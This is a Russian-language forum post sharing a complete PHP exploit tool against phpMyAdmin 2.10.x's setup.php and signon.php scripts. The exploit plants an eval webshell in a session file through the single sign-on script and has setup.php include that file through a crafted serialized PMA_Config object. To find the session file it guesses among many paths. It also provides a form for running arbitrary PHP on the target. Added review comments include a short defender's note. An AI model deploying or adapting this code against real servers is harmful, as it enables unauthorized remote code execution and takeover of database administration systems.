Тайну раскрыли 
My version:
Решил пару случаев с версиями 2.10.0 и выше при allow_url_fopen Off. Можно инжектить PHP-код в сессию, т.к. с этими версиями идёт скрипт
/scripts/signon.php
Цитата:
auth_type signon is a feature to allow phpMyAdmin to integrate with Single Sign-on (SSO) systems. Administrators can configure their phpMyAdmin installations to get a MySQL username and password from an existing SSO session, allowing the user sign in once to a control panel, for example, and then switching between applications such as phpMyAdmin without the need to log in again.
|
PHP код:
/* Was data posted? */
if (isset($_POST['user'])) {
/* Need to have cookie visible from parent directory */
session_set_cookie_params(0, '/', '', 0);
/* Create signon session */
$session_name = 'SignonSession';
session_name($session_name);
session_start();
/* Store there credentials */
$_SESSION['PMA_single_signon_user'] = $_POST['user'];
$_SESSION['PMA_single_signon_password'] = $_POST['password'];
$_SESSION['PMA_single_signon_host'] = $_POST['host'];
Exploit
PHP код:
<?php
set_time_limit(0); // No execution-time cap: the path loop below issues one request per candidate path, each with a 600 s cURL timeout.
/**
 * Send a POST request with cURL and return the raw response, headers included.
 *
 * @param string       $url    Request URL.
 * @param string|array $post   Body handed to CURLOPT_POSTFIELDS.
 * @param string       $nocook When non-empty, no cookie file/jar is attached, so any
 *                             Set-Cookie header is only visible in the returned text;
 *                             when empty, cookies are read from and written to cook.txt.
 * @return string|false Result of curl_exec(): the response text, or false on transport failure.
 */
function getData($url,$post,$nocook = '')
{
    $handle = curl_init($url);
    // Option order mirrors the original call sequence; CURLOPT_NOBODY is applied last.
    $options = array(
        CURLOPT_HEADER         => true,
        CURLOPT_USERAGENT      => "Googlebot/2.1 (+http://www.google.com/bot.html)",
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_SSL_VERIFYPEER => FALSE, // NOTE(review): TLS peer verification is disabled here.
        CURLOPT_TIMEOUT        => 600,
    );
    if (empty($nocook)) {
        $options[CURLOPT_COOKIEFILE] = 'cook.txt';
        $options[CURLOPT_COOKIEJAR]  = 'cook.txt';
    }
    $options[CURLOPT_POST]           = 1;
    $options[CURLOPT_POSTFIELDS]     = $post;
    $options[CURLOPT_RETURNTRANSFER] = 1;
    $options[CURLOPT_NOBODY]         = 0;
    curl_setopt_array($handle, $options);
    return curl_exec($handle);
}
$url = $_POST['url']; // Target setup.php URL, taken from this tool's own form (echoed below).
// Payload that ends up in the server-side session file via signon.php, which stores
// $_POST['user'] into $_SESSION without validation (see the quoted snippet above).
// It eval()s $_REQUEST['c'] and exits with $_REQUEST['m'], so the loop at the bottom can
// tell from the response whether the session file was actually included.
$shell = '<?php @eval(stripslashes($_REQUEST[c])); @die($_REQUEST[m]); ?>';
$die_text = 'Injected'; // Marker sent as m= and echoed back by the payload on success.
// Candidate session.save_path locations. The real path is unknown to the client, so each is
// tried blind; the relative entries are resolved against the server process's working
// directory (presumably the scripts/ directory — not verifiable from here).
$sess_path = array( '/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
'/shared/sessions',
'/var/php_sessions/',
'/var/sessions/',
'/tmp/php_sessions/',
'/tmp/sessions/',
'../../../tmp/',
'../../../../tmp/',
'../../../../../tmp/',
'../../../../../../tmp/',
'../../../../../../../tmp/',
'../../../temp/',
'../../../../temp/',
'../../../../../temp/',
'../../../../../../temp/',
'../../../../../../../temp/',
'../../../sessions/',
'../../../../sessions/',
'../../../../../sessions/',
'../../../../../../sessions/',
'../../../../../../../sessions/',
'../../../phptmp/',
'../../../../phptmp/',
'../../../../../phptmp/',
'../../../../../../phptmp/',
'../../../../../../../phptmp/');
// NOTE(review): $_POST['url'] and $_POST['post'] are written into attribute values without
// htmlspecialchars(), and the bare ternaries raise an undefined-index notice on first load.
echo '<form action="" method="POST">
URL:
<br>
<input name="url" value="'.($_POST['url'] ? $_POST['url'] : 'http://localhost/pma/scripts/setup.php').'" size=50><br><br>
Post:
<br>
<input name="post" value="'.($_POST['post'] ? $_POST['post'] : 'phpinfo();').'" size=50><br><br>
<input type="submit" value="Go">
</form>';
if(!empty($url)){
// Step 1: signon.php sits next to setup.php, so its URL is derived from the one supplied.
$signon_url = str_replace('setup.php','signon.php',$url);
// Step 2: POST the payload as the "user" field. The third argument is non-empty, so no cookie
// jar is used and the Set-Cookie header stays in the returned text (CURLOPT_HEADER is on).
$signon_page = getData($signon_url,'user='.$shell,'1');
// Step 3: the SignonSession cookie value is the session id, i.e. the suffix of the
// sess_<id> file name assembled in the loop below.
preg_match('/SignonSession=(.*); path=\//U',$signon_page,$signon_array);
$signon = $signon_array[1];
if(empty($signon)){
die('SignonSession not found');
}
// Step 4: load setup.php (this time with the cookie jar) and extract its 32-hex "token" form
// field, which the POST below must carry.
$token_page = getData($url,'');
preg_match('/name="token" value="([a-f0-9]{32})"/is',$token_page,$token_array);
$token = $token_array[1];
if(empty($token)){
die('Token not found');
}
// Step 5: for every candidate path, send a hand-built serialized PMA_Config object whose
// "source" property names the session file; the strlen() call must match the string exactly
// or the serialized form is invalid. Presumably setup.php unserialize()s "configuration" and
// loads the file named in "source" — setup.php itself is not shown on this page, so that is
// inferred from the payload shape. Defender's view: the chain depends on scripts/ (setup.php
// and signon.php) still being reachable after installation and on session files sitting at a
// guessable path readable by the web server; blocking access to scripts/ once setup is done
// and keeping phpMyAdmin patched removes both prerequisites.
foreach($sess_path as $s){
$res = getData($url,'m='.$die_text.'&c='.$_POST['post'].'&action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.'a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($s.'sess_'.$signon).':"'.$s.'sess_'.$signon.'";}}');
// The payload's die($_REQUEST['m']) echoes the marker, so its presence means the include succeeded.
if(eregi($die_text,$res)){
die($res);
}
}
}
?>